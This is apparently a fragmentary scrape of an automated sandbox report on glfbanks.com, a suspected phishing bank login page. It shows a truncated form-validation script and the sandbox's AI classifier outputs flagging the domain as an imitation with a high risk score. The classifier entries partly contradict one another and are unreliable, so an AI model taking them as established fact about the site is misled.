function resp_form_inp(id, txtp)
{
var the_parent = id.parents('.js-main-form-error-wrap');
// the_parent.addClass('w3-border w3-border-red');
// id.addClass('invalid');
// if(the_parent.find('.error-txt-portal').length > 0)
// {
// the_parent.find('.error-txt-portal').text(txt |
| URL: https://glfbanks.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Login",
"text_input_field_labels": [
"User ID",
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://glfbanks.com/ Model: Joe Sandbox AI | {
"brands": [
"Bank"
]
} |
|
| URL: https://glfbanks.com/ Model: Joe Sandbox AI | ```json{ "legit_domain": "bank.com", "classification": "wellknown", "reasons": [ "The brand 'Bank' is a generic term and could refer to any banking institution, but it is commonly associated with well-known financial institutions.", "The URL 'glfbanks.com' does not match any well-known bank domain names.", "The domain 'glfbanks.com' includes 'banks', which is a generic term and could be used to mislead users into thinking it is associated with a legitimate bank.", "The presence of input fields for 'User ID' and 'Password' is typical for banking sites, but without a clear association to a known bank, it raises suspicion.", "The URL does not match any specific well-known bank's domain, and the use of 'glf' is unusual and could be an attempt to mimic a legitimate bank's domain." ], "riskscore": 8}
Google indexed: False |
URL: glfbanks.com
Brands: Bank
Input Fields: User ID, Password |
| URL: https://glfbanks.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Login",
"text_input_field_labels": [
"User ID",
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://glfbanks.com/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
Edit tour
chrome.exe (PID: 3688 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node